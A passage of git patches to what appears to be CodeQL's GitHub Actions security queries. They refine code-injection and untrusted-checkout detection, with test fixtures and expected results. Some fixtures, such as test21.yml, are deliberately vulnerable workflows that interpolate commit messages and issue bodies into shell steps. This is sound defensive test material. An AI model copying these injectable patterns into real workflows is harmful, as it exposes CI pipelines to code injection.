and result = this.getEnclosingWorkflow().getATriggerEvent() + } /** * Gets the enclosing Step. From 62d9302e8ba4de3a8c4558451f8f4e7d88aedc20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:44 +0100 Subject: [PATCH 0638/1267] chore: remove leftover commented out code --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 7 ------- 1 file changed, 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ffbb6fac263..9653ae2beda 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,6 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -209,7 +208,6 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink @@ -242,7 +240,6 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and @@ -273,7 +270,6 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -297,7 +293,6 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -318,7 +313,6 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -341,7 +335,6 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) From 792e8555af5b5a6628ee1ab956b81ffdaafe3a96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:56:59 +0100 Subject: [PATCH 0639/1267] fix: remove context 2 events mappings client_paylaod (dispatch), commits (push), head_commit (push) and merge_group are not under external attacker control so remove them --- ql/lib/ext/config/context_event_map.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 35ccafc5bee..4d28fa778e0 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -40,14 +40,10 @@ extensions: - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] - - ["workflow_call", "github.event.commits"] - ["workflow_call", "github.event.discussion"] - - ["workflow_call", "github.event.head_commit"] - ["workflow_call", "github.event.inputs"] - ["workflow_call", "github.event.issue"] - - ["workflow_call", "github.event.merge_group"] - ["workflow_call", "github.event.pages"] - ["workflow_call", "github.event.pull_request"] - ["workflow_call", "github.event.review"] From 18137f58c299182fbbc1033e323d77c1a072e277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:14 +0100 Subject: [PATCH 0640/1267] fix: take trigger events into consideration Code Injection remote flow sources should be triggerable by the privileged event --- .../Security/CWE-094/CodeInjectionCritical.ql | 6 +- .../.github/actions/action5/action.yml | 4 +- .../CWE-094/.github/workflows/test21.yml | 24 ++ .../CWE-094/CodeInjectionCritical.expected | 312 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 13 +- 5 files changed, 193 insertions(+), 166 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ef66ac229f2..a197c577948 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -23,6 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and + source.getNode().(RemoteFlowSource).getEvent() = event and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | @@ -31,5 +32,6 @@ where exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential code injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index a03c27be226..53a2e0c87e2 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.issue.body }}' - name: Step id: step env: @@ -25,7 +25,7 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.pull_request.body }} + FOO2: ${{ github.event.issue.body }} shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml new file mode 100644 index 00000000000..03ecc20de86 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -0,0 +1,24 @@ +on: + push: + branches: + - main + - 'release/v*' + workflow_dispatch: + inputs: + version: + required: true + description: 'Release' + type: string + +jobs: + release-tag: + runs-on: ubuntu-latest + if: ${{ startsWith(github.event.head_commit.message, 'release:') }} + steps: + - name: Extract version and PR number from commit message + id: extract_info + shell: bash + run: | + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index dd9836805bd..4a2950d84ae 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | @@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -612,153 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in 